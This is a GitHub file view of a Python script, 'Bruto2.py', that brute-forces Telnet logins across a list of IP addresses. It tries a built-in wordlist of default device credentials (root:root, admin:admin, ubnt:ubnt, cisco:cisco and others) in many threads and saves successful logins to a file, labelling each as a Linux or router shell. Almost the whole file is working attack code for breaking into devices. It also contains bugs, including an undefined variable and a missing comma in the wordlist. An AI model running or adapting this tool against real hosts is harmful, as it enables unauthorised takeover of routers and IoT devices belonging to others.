-
Notifications
You must be signed in to change notification settings - Fork 0
/
Bruto2.py
139 lines (120 loc) · 3.98 KB
/
Bruto2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
import sys,os,re,base64,subprocess,time,socket,telnetlib,threading, resource
from sys import stdout
# Starts the timer
start = time.time()
resource.setrlimit(resource.RLIMIT_NOFILE, (1000, -1))
# Telnet wordlist
# Expanded Wordlist: https://github.com/milo2012/pentest_scripts/blob/master/default_accounts_wordlist/wordList_telnet.txt
combo = [
"thisisafalsealarm:thisisafalsealarm",
"nope:nope",
"root:root",
"admin:admin",
"root:",
"admin:",
"default:",
"User:admin",
"guest:12345",
"admin:1234",
"admin:12345",
"admin:password",
"ubnt:ubnt",
"guest:guest",
"user:user",
"default:OxhlwSG8",
"default:S2fGqNFs",
"admin:smcadmin"
"sysadm:sysadm",
"support:support",
"root:default",
"root:password",
"adm:",
"bin:",
"daemon:",
"root:cat1029",
"admin:cat1029",
"admin:123456",
"root:antslq",
"cisco:cisco",
"cisco:"
]
# Gets the input arguments
if (len(sys.argv) < 4):
print("Usage: python3 "+sys.argv[0]+" <list> <threads> <output file>")
sys.exit()
# Checks if the output file already exists
with open(str(sys.argv[1]), "r") as f:
ips = f.readlines()
ips = ''.join(map(str, ips))
ips = ips.split("\n")
f.close()
threads = int(sys.argv[2])
output_file = sys.argv[3]
response = ""
# Bruteforces the given IP using the 'combo' wordlist
def Brute(ip):
Auth = False
for passw in combo:
# Splits username and password from wordlist
username = passw.split(":")[0]
password = passw.split(":")[1]
# Starts a new connection to the socket of the given IP
try:
tn = socket.socket()
tn.settimeout(8)
target = ((str(ip), 23))
tn.connect(target)
except:
break
# Tries to access
try:
username += "\n"
username = bytes(username, 'utf-8')
password += "\n"
password = bytes(password, 'utf-8')
tn.send(username)
time.sleep(1.9)
tn.send(password)
time.sleep(1.8)
except:
break
# Gets the response of the access request
try:
response = tn.recv(40960)
except:
break
# Checks the response and tells if it's worthy or not
# Tells, if worthy, what type of system the access is granted to
if (b"#" in response or b"$" in response):
if (username != b'thisisafalsealarm\n' and username != b'nope\n'):
os.system("echo "+str(ip)+":23 "+str(username[:-1])+":"+str(password[:-1])+" >> "+output_file+"")
print("\033[32m[\033[31m+\033[32m] \033[33mBRUTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(str(username[:-1]), str(password[:-1]), ip) + " \033[32m(Linux/UNIX shell)")
Auth = True
tn.close()
break
else:
break
elif (b"@" in response or b"%" in response or b">" in response and b"ONT" not in response ):
if (username != b'thisisafalsealarm\n' and username != b'nope\n' and b"invalid" not in response and b"refused" not in response and b"failed!" not in response):
os.system("echo "+str(ip)+":23 "+str(username[:-1])+":"+str(password)+" >> "+output_file+"")
print("\033[32m[\033[31m+\033[32m] \033[33mBRUTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(str(username[:-1]), str(password[:-1]), ip) + " \033[32m(Router/Android/UNIX shell)")
Auth = True
tn.close()
break
else:
break
else:
tn.close()
return
# Thread class
class theBruto(threading.Thread):
def __init__(self, ip):
threading.Thread.__init__(self)
self.ip = ip
def run(self):
Brute(self.ip)
# Runs the threads
for j in range(lns):
print(j)
bruting = theBruto(ips[j])
bruting.start()